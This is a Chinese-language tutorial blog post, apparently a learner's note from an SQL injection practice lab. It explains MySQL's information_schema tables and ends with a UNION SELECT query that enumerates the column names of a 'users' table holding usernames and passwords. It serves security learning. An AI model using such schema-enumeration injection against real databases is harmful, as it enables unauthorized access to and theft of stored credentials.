标签:users information name INNODB SQL table security schema
在学习SQL注入时, 经常拿出来的例子就是PHP+MySQL这一套经典组合. 其中又经常提到的>=5.0版本的MySQL的内置库: information_schema
简单看一下information_schema库中的内容
其中在注入时关注的两张表: tables 和 columns
mysql> use information_schema Database changed mysql> show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_BUFFER_PAGE | | INNODB_TRX | | INNODB_BUFFER_POOL_STATS | | INNODB_LOCK_WAITS | | INNODB_CMPMEM | | INNODB_CMP | | INNODB_LOCKS | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_BUFFER_PAGE_LRU | +---------------------------------------+ 40 rows in set (0.00 sec)
其中tables表中保存的是库和表名的对应信息, 分别是table_schema, table_name.
通过select table_schema, table_name from tables, 可以查询整个MySQL下所有的库名和表名的对应信息. 注意是全部的, 查询指定库的话, 使用where条件指定即可
mysql> select table_schema, table_name from tables where table_schema='security'; +--------------+------------+ | table_schema | table_name | +--------------+------------+ | security | emails | | security | referers | | security | uagents | | security | users | +--------------+------------+ 4 rows in set (0.00 sec)
另一张表columns, 里面是有三个字段的, table_schema, table_name, column_name
mysql> select table_schema, table_name, column_name from columns where table_schema='security' and table_name='users'; +--------------+------------+-------------+ | table_schema | table_name | column_name | +--------------+------------+-------------+ | security | users | id | | security | users | username | | security | users | password | +--------------+------------+-------------+ 3 rows in set (0.01 sec)
带入到联合查询中的写法
mysql> select id, username, password from users where id = 1 union select table_schema, table_name, column_name from information_schema.columns where table_schema=database() and table_name='users'; +----------+----------+----------+ | id | username | password | +----------+----------+----------+ | 1 | Dumb | Dumb | | security | users | id | | security | users | username | | security | users | password | +----------+----------+----------+ 4 rows in set (0.00 sec)
标签:users,information,name,INNODB,SQL,table,security,schema 来源: https://www.cnblogs.com/saodeng/p/16214734.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。